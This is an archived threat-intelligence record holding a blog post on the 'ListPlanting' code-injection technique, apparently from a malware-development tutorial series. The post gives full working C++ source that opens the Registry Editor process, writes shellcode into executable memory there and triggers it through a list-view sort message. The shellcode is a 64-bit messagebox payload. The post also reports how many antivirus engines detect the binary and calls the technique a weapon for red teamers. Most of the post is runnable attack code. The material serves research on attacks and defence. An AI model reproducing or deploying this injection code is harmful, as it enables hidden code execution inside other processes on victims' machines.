{
	"id": "64b4f928-a5ea-4e43-8483-bf1d3af7f418",
	"created_at": "2026-04-06T00:11:42.794898Z",
	"updated_at": "2026-04-10T03:25:50.546404Z",
	"deleted_at": null,
	"sha1_hash": "588ed4a043b23a6df69e00cef073fdcc86b620b5",
	"title": "Malware development tricks: part 24. Listplanting. C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1748882,
	"plain_text": "Malware development tricks: part 24. Listplanting. C++ example.\r\nBy cocomelonc\r\nPublished: 2022-11-27 · Archived: 2026-04-05 23:00:39 UTC\r\n2 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the result of my own research into the malware dev trick: Listplanting.\r\nUsing the LVM_SORTGROUPS, LVM_INSERTGROUPSORTED, and LVM_SORTITEMS messages, a ListView control’s items and groups can have their sorting behavior modified to suit individual preferences. List-view controls are user interface windows that display groups of things. A SysListView32 control stores information about an application’s list-view settings in the process’ memory.\r\nListPlanting may be performed by copying code into the virtual address space of a process that uses a list-view control, then using that code as a custom callback for sorting the listed items.\r\npractical example\r\nLet’s look at a practical example. The trick is pretty simple:\r\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\nPage 1 of 10\n\nFirst of all, get the window handle:\r\nHWND wpw = FindWindow(NULL, (LPCSTR)\"Registry Editor\");\r\nHWND hw = FindWindowEx(wpw, 0, (LPCSTR)\"SysListView32\", 0);\r\nThen, get the process ID and open it (get the process handle via OpenProcess):\r\nGetWindowThreadProcessId(hw, \u0026pid);\r\nph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\r\nAt the next step, we allocate RWX memory via VirtualAllocEx and “copy” the payload:\r\nmem = VirtualAllocEx(ph, NULL, sizeof(my_payload), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n// copy payload\r\nWriteProcessMemory(ph, mem, my_payload, sizeof(my_payload), NULL);\r\nFinally, trigger the payload:\r\n// trigger payload\r\nPostMessage(hw, LVM_SORTITEMS, 0, (LPARAM)mem);\r\nAccording to the documentation, PostMessage “places (posts) a message in the message queue associated with the thread that created the specified window and returns without waiting for the thread to process the message.”\r\nThe full source code of my PoC:\r\n/*\r\nhack.cpp\r\ncode injection Listplanting\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003ccommctrl.h\u003e\r\n#include \u003ciostream\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nunsigned char my_payload[] =\r\n // 64-bit meow-meow messagebox\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nint main(int argc, char* argv[]) {\r\n HANDLE ph;\r\n DWORD pid;\r\n LPVOID mem;\r\n // find window\r\n HWND wpw = FindWindow(NULL, (LPCSTR)\"Registry Editor\");\r\n HWND hw = FindWindowEx(wpw, 0, (LPCSTR)\"SysListView32\", 0);\r\n // obtain the process id and try to open process\r\n GetWindowThreadProcessId(hw, \u0026pid);\r\n ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\r\n // allocate RWX memory\r\n mem = VirtualAllocEx(ph, NULL, sizeof(my_payload), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n // copy payload\r\n WriteProcessMemory(ph, mem, my_payload, sizeof(my_payload), NULL);\r\n // trigger payload\r\n PostMessage(hw, LVM_SORTITEMS, 0, (LPARAM)mem);\r\n // free memory\r\n VirtualFreeEx(ph, mem, 0, MEM_DECOMMIT | MEM_RELEASE);\r\n CloseHandle(ph);\r\n return 0;\r\n}\r\nAs you can see, as usual, for simplicity I used the meow-meow messagebox payload:\r\nunsigned char my_payload[] =\r\n // 64-bit meow-meow messagebox\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\ndemo\r\nLet’s see everything in action. Compile our “malware”:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-secti\r\nThen, run Registry Editor in the victim machine (Windows 10 x64 in my case):\r\nAnd, run our hack.exe:\r\n.\\hack.exe\r\nRun it as Administrator, because injecting into Registry Editor (regedit.exe) requires elevated privileges.\r\nFor correctness, run Process Hacker 2 as Administrator and check the memory tab:\r\nAs you can see, everything works perfectly :)\r\nLet’s upload hack.exe to VirusTotal:\r\nSo, 19 of 71 AV engines detect our file as malicious.\r\nhttps://www.virustotal.com/gui/file/a1037630f95f721c6a7a1b6d8c278b4e926253b3888ac838d507af8c8baf8844/detection\r\nThis technique is used in InvisiMole. InvisiMole is a modular spyware software that the InvisiMole Group has been using since at least 2013.\r\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red teamers’ arsenal.\r\nATT\u0026CK MITRE: ListPlanting\r\nInvisiMole\r\nPostMessage\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html"
	],
	"report_names": [
		"malware-tricks-24.html"
	],
	"threat_actors": [
		{
			"id": "11f52079-26d3-4e06-8665-6a0b3efdc41c",
			"created_at": "2022-10-25T16:07:23.736987Z",
			"updated_at": "2026-04-10T02:00:04.732021Z",
			"deleted_at": null,
			"main_name": "InvisiMole",
			"aliases": [
				"UAC-0035"
			],
			"source_name": "ETDA:InvisiMole",
			"tools": [
				"InvisiMole"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "12b5d602-4017-4a6f-a2a3-387a6e07a27b",
			"created_at": "2023-01-06T13:46:39.095233Z",
			"updated_at": "2026-04-10T02:00:03.21157Z",
			"deleted_at": null,
			"main_name": "InvisiMole",
			"aliases": [],
			"source_name": "MISPGALAXY:InvisiMole",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434302,
	"ts_updated_at": 1775791550,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/588ed4a043b23a6df69e00cef073fdcc86b620b5.pdf",
		"text": "https://archive.orkl.eu/588ed4a043b23a6df69e00cef073fdcc86b620b5.txt",
		"img": "https://archive.orkl.eu/588ed4a043b23a6df69e00cef073fdcc86b620b5.jpg"
	}
}